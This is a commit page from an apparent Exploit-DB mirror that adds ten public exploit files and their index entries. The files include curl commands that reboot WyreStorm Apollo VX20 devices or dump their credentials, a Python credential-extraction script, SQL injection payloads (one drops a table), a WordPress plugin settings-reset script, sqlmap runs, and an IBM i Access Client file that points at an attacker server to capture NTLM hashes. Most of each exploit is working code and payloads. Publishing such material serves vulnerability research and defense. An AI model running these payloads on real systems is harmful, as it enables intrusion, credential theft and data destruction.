bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-02-27

Browse source 
12 changes to exploits/shellcodes/ghdb

Wyrestorm Apollo VX20  < 1.3.58 - Incorrect Access Control 'DoS'
Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration
Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'
FAQ Management System v1.0 - 'faq' SQL Injection
Flashcard Quiz App v1.0 - 'card' SQL Injection

Simple Inventory Management System v1.0 - 'email' SQL Injection

comments-like-dislike < 1.2.0 - Authenticated (Subscriber+) Plugin Setting Reset

Online Shopping System Advanced - Sql Injection

taskhub 2.8.7 - SQL Injection

IBM i Access Client Solutions v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4 - Remote Credential Theft
This commit is contained in:
Exploit-DB 2024-02-27 00:16:33 +00:00
parent 624b24bca9
commit 9734fcef1e
12 changed files with 730 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

63
exploits/multiple/dos/51815.txt Normal file
View file

@ -0,0 +1,63 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Incorrect Access Control (DOS)
[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58
[Affected Component]
Web interface, reboot and reset commands
[CVE Reference]
CVE-2024-25736
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.
[Exploit/POC]
curl -k https://192.168.x.x/device/reboot
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

63
exploits/multiple/remote/51814.txt Normal file
View file

@ -0,0 +1,63 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Account Enumeration
[CVE Reference]
CVE-2024-25734
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered.
Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account.
[Exploit/POC]
TELNET x.x.x.x 23
username:aa
username:bb
username:admin
password:
[Network Access]
Remote
[Affected Product Code Base]
APOLLO VX20 - < 1.3.58, fixed in v1.3.58
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

83
exploits/multiple/remote/51816.txt Normal file
View file

@ -0,0 +1,83 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)
[Affected Component]
Web interface, config
[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58
[CVE Reference]
CVE-2024-25735
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config
E.g. HTTP response snippet:
:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"}
,"softAp":{"password":"12345678","router":"y","softAp":"y"}...
[Exploit/POC]
import requests
target="https://x.x.x.x"
res = requests.get(target+"/device/config", verify=False)
idx=res.content.find('{"password":')
if idx != -1:
idx2=res.content.find('router')
if idx2 != -1:
print("[+] CVE-2024-25735 Credentials Disclosure")
print("[+] " + res.content[idx + 1:idx2 + 11])
print("[+] hyp3rlinx")
else:
print("[!] Apollo vX20 Device not vulnerable...")
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

64
exploits/php/remote/51808.txt Normal file
View file

@ -0,0 +1,64 @@
# Exploit Title: Simple Inventory Management System v1.0 - 'email' SQL Injection
# Google Dork: N/A
# Application: Simple Inventory Management System
# Date: 26.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.
## Proof of Concept (PoC):
An example attacker could input the following values:
email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'
pwd: test
This would result in the following SQL query:
SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'
This attack would retrieve all users, making the login process always successful.
request-response foto:https://i.imgur.com/slkzYJt.png
## Vulnerable code section:
====================================================
ims/login.php
<?php
ob_start();
session_start();
include('inc/header.php');
$loginError = '';
if (!empty($_POST['email']) && !empty($_POST['pwd'])) {
include 'Inventory.php';
$inventory = new Inventory();
// Vulnerable code
$login = $inventory->login($_POST['email'], $_POST['pwd']);
//
if(!empty($login)) {
$_SESSION['userid'] = $login[0]['userid'];
$_SESSION['name'] = $login[0]['name'];
header("Location:index.php");
} else {
$loginError = "Invalid email or password!";
}
}
?>
## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html

46
exploits/php/remote/51812.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection
# Google Dork: N/A
# Application: Flashcard Quiz App
# Date: 25.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Proof of Concept (PoC):
This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.
1. Original Code:
$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
2. Payload:
' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
3. Injected Query:
DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
Request Response foto: https://i.imgur.com/5IXvpiZ.png
## Vulnerable code section:
====================================================
endpoint/delete-flashcard.php
$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";

48
exploits/php/remote/51813.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: FAQ Management System v1.0 - 'faq' SQL Injection
# Google Dork: N/A
# Application: FAQ Management System
# Date: 25.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.
## Proof of Concept (PoC):
An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:
1. Original Request:
http://example.com/endpoint/delete-faq.php?faq=123
2.Malicious Request (SQL Injection):
http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --
This would result in a query like:
DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --
Which can lead to the deletion of data or even the entire table.
poc foto: https://i.imgur.com/1IENYFg.png
## Vulnerable code section:
====================================================
endpoint/delete-faq.php
$faq = $_GET['faq'];
// ...
$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";

62
exploits/php/webapps/51809.py Executable file
View file

@ -0,0 +1,62 @@
# Exploit Title: POC-CVE-2023-3244
# Date: 9/12/2023
# Exploit Author: Diaa Hanna
# Software Link: [download link if available]
# Version: <= 1.2.0 comments-like-dislike
# Tested on: 1.1.6 comments-like-dislike
# CVE : CVE-2023-3244
#References
#https://nvd.nist.gov/vuln/detail/CVE-2023-3244
#The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin.
#This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users.
#For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244).
import requests
import argparse
import sys
from colorama import Fore
parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ')
parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True)
parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True)
parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True)
parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False)
args=parser.parse_args()
#check if the domain ends with a '/' if not then add it
url=args.url
if url[-1] != '/':
url+='/'
wp_login = f'{url}wp-login.php'
wp_admin = f'{url}wp-admin/'
username = args.username
password = args.password
session=requests.Session()
#logging in
session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In',
'redirect_to':wp_admin, 'testcookie':'1' },verify=not (args.nossl))
#if failed to login
if len(session.cookies.get_dict()) == 2:
print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again")
sys.exit(1)
#making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function
#the restore_settings function does not check the sufficient privileges of a logged-in user
#even a subscriber can use this POC
response=session.get(f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action",verify=not (args.nossl))
if response.text == "Settings restored successfully.Redirecting...":
print(Fore.GREEN +"exploited excuted successfully")
print(Fore.YELLOW+ "settings of the comments-like-dislike plugin should be defaulted on the server")
sys.exit(0)
else:
print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway")
sys.exit(1)

67
exploits/php/webapps/51810.txt Normal file
View file

@ -0,0 +1,67 @@
# Exploit Title: taskhub 2.8.7 - SQL Injection
# Exploit Author: CraCkEr
# Date: 05/09/2023
# Vendor: Infinitie Technologies
# Vendor Homepage: https://www.infinitietech.com/
# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Demo: https://taskhub.company/auth
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4987
# CWE: CWE-89 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /home/get_tasks_list
GET parameter 'project' is vulnerable to SQL Injection
GET parameter 'status' is vulnerable to SQL Injection
GET parameter 'user_id' is vulnerable to SQL Injection
GET parameter 'sort' is vulnerable to SQL Injection
GET parameter 'search' is vulnerable to SQL Injection
https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]
---
Parameter: project (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
Parameter: status (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
Parameter: user_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
Parameter: sort (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=
Parameter: search (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
---
[-] Done

75
exploits/php/webapps/51811.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: Online Shopping System Advanced
# Date: 07.12.2023
# Exploit Author: Furkan Gedik
# Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link: https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Version: 1.0
# Tested on: [Kali Linux 2020.3]
# Description
Unauthorized access to a database by injecting malicious SQL statements. The SQL injection vulnerability occurs due to the inclusion of the user-provided "cm" parameter in the SQL query without proper filtering or sanitization. An attacker can exploit the vulnerability by injecting malicious SQL code in the "cm" parameter. Successful exploitation of the vulnerability results in the disclosure of sensitive information from the database, such as user credentials, which can be used to gain unauthorized access to the database.
# PoC
[+] sqlmap output
sqlmap.py -u "http://localhost/online-shopping-system-advanced/payment_success.php?st=Completed&cm=1" -p cm --dbms=mysql -technique=T --proxy=http://127.0.0.1:8080
Parameter: cm (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: st=Completed&cm=1' AND (SELECT 1415 FROM (SELECT(SLEEP(5)))NRHH) AND 'jLpV'='jLpV
# Vulnerability
https://github.com/PuneethReddyHC/online-shopping-system-advanced/blob/master/payment_success.php#L12-L22
[+] payment_success.php
if (isset($_GET["st"])) {
# code...
$trx_id = $_GET["tx"];
$p_st = $_GET["st"];
$amt = $_GET["amt"];
$cc = $_GET["cc"];
$cm_user_id = $_GET["cm"];
$c_amt = $_COOKIE["ta"];
if ($p_st == "Completed") {
include_once("db.php");
$sql = "SELECT p_id,qty FROM cart WHERE user_id = '$cm_user_id'";

96
exploits/windows_x86-64/remote/51817.txt Normal file
View file

@ -0,0 +1,96 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.ibm.com
[Product]
IBM i Access Client Solutions
[Versions]
All
[Remediation/Fixes]
None
[Vulnerability Type]
Remote Credential Theft
[CVE Reference]
CVE-2024-22318
[Security Issue]
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.
Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.
If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.
The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.
[References]
https://www.ibm.com/support/pages/node/7116091
[Exploit/POC]
The client access .HOD File vulnerable parameters:
1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c
[KeyRemapFile]
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c
Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv
The client access legacy .WS File vulnerable parameters:
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c
Example, client access older .WS file
[Profile]
ID=WS
Version=9
[Telnet5250]
AssociatedPrinterStartMinimized=N
AssociatedPrinterTimeout=0
SSLClientAuthentication=Y
HostName=PWN
AssociatedPrinterClose=N
Security=CA400
CertSelection=AUTOSELECT
AutoReconnect=Y
[KeepAlive]
KeepAliveTimeOut=0
[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
[Communication]
Link=telnet5250
[Network Access]
Remote
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: December 14, 2023
Vendor Addresses Issue: February 7, 2024
February 8, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

10
files_exploits.csv
View file

@ -10317,6 +10317,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15707,exploits/multiple/dos/15707.txt,"WonderWare InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",dos,multiple,,2010-12-08,2010-12-15,0,CVE-2010-4557;OSVDB-69936,,udpsz.zip,,,http://aluigi.org/adv/inbatch_1-adv.txt
33099,exploits/multiple/dos/33099.txt,"World in Conflict 1.0.1 - Typecheck Remote Denial of Service",2009-06-16,"Luigi Auriemma",dos,multiple,,2009-06-16,2014-05-01,1,,,,,,https://www.securityfocus.com/bid/35751/info
31957,exploits/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",dos,multiple,,2008-06-23,2014-03-03,1,CVE-2008-6713;OSVDB-46533,,,,,https://www.securityfocus.com/bid/29888/info
51815,exploits/multiple/dos/51815.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'DoS'",2024-02-26,hyp3rlinx,dos,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25736,,,,,
26145,exploits/multiple/dos/26145.c,"Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service",2005-08-10,"Piotr Chytla",dos,multiple,,2005-08-10,2013-06-13,1,CVE-2005-2577;OSVDB-18698,,,,,https://www.securityfocus.com/bid/14536/info
5152,exploits/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,dos,multiple,,2008-02-18,,1,CVE-2007-5958,,,,,
25393,exploits/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",dos,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1078;OSVDB-15636,,,,,https://www.securityfocus.com/bid/13131/info
@ -11547,6 +11548,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",remote,multiple,,1999-12-09,2017-11-15,1,CVE-1999-0972;OSVDB-1158,,,,,https://www.securityfocus.com/bid/863/info
32987,exploits/multiple/remote/32987.txt,"Woodstock 4.2 404 - Error Page Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple,,2009-05-05,2014-04-23,1,CVE-2009-1554;OSVDB-54220,,,,,https://www.securityfocus.com/bid/34829/info
201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21,2000-11-20,2016-12-04,1,OSVDB-11805;CVE-2000-0573,,,,http://www.exploit-db.comwu-ftpd-2.6.0-2.src.rpm,
51814,exploits/multiple/remote/51814.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration",2024-02-26,hyp3rlinx,remote,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25734,,,,,
51816,exploits/multiple/remote/51816.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'",2024-02-26,hyp3rlinx,remote,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25735,,,,,
9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,,2009-07-09,2017-04-01,1,CVE-2009-0695;OSVDB-55839,"Metasploit Framework (MSF)",,,,
1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21,2005-11-03,2018-01-18,1,OSVDB-19682;CVE-2005-3081,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwzdftpd-0.5.4.exe,
51111,exploits/multiple/remote/51111.txt,"X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)",2023-03-28,"Hosein Vita",remote,multiple,,2023-03-28,2023-03-28,0,CVE-2022-38580,,,,,
@ -12934,6 +12937,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb
51749,exploits/php/remote/51749.TXT,"Equipment Rental Script-1.0 - SQLi",2024-01-29,nu11secur1ty,remote,php,,2024-01-29,2024-01-29,0,,,,,,
24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,remote,php,,2013-01-10,2013-01-10,1,OSVDB-88751,"Metasploit Framework (MSF)",,,,
51813,exploits/php/remote/51813.txt,"FAQ Management System v1.0 - 'faq' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
51812,exploits/php/remote/51812.txt,"Flashcard Quiz App v1.0 - 'card' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
40434,exploits/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,remote,php,,2016-09-27,2016-09-27,0,,"Metasploit Framework (MSF)",,,,
46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,,2019-05-20,2019-05-20,1,CVE-2019-11231,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,,2018-07-09,2018-07-09,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comgitlist-0.6.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/545e91af0077d1039b0f861346aada45fdfdf10e/modules/exploits/multi/http/gitlist_arg_injection.rb
@ -13069,6 +13074,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21138,exploits/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,remote,php,,2012-09-08,2012-09-08,1,OSVDB-83767,"Metasploit Framework (MSF)",,,,
46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,,2019-05-23,2019-05-23,1,CVE-2017-18357,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
31264,exploits/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,remote,php,80,2014-01-29,2014-01-29,1,OSVDB-102635,"Metasploit Framework (MSF)",,,,
51808,exploits/php/remote/51808.txt,"Simple Inventory Management System v1.0 - 'email' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
27941,exploits/php/remote/27941.rb,"SPIP - 'connect' PHP Injection (Metasploit)",2013-08-29,Metasploit,remote,php,,2013-08-29,2013-08-29,1,OSVDB-83543,"Metasploit Framework (MSF)",,,,
24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,"Metasploit Framework (MSF)",,,,
24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,Malware,,,,
@ -16112,6 +16118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37436,exploits/php/webapps/37436.txt,"Commentics - 'index.php' Cross-Site Scripting",2012-06-20,"Jean Pascal Pereira",webapps,php,,2012-06-20,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54111/info
19325,exploits/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",webapps,php,,2012-06-21,2012-06-21,0,OSVDB-83148;OSVDB-83147;OSVDB-83146,,,,http://www.exploit-db.comcommentics.zip,
2648,exploits/php/webapps/2648.txt,"CommentIT - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",webapps,php,,2006-10-24,,1,,,,,,
51809,exploits/php/webapps/51809.py,"comments-like-dislike < 1.2.0 - Authenticated (Subscriber+) Plugin Setting Reset",2024-02-26,"Diaa Hanna",webapps,php,,2024-02-26,2024-02-26,0,,,,,,
26570,exploits/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL Injection",2005-11-23,r0t3d3Vil,webapps,php,,2005-11-23,2013-07-03,1,,,,,,https://www.securityfocus.com/bid/15552/info
33634,exploits/php/webapps/33634.txt,"CommodityRentals CD Rental Software - 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-11,2014-06-04,1,,,,,,https://www.securityfocus.com/bid/38184/info
36079,exploits/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' HTML Injection",2011-08-24,"Eyup CELIK",webapps,php,,2011-08-24,2015-02-15,1,,,,,,https://www.securityfocus.com/bid/49296/info
@ -24905,6 +24912,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
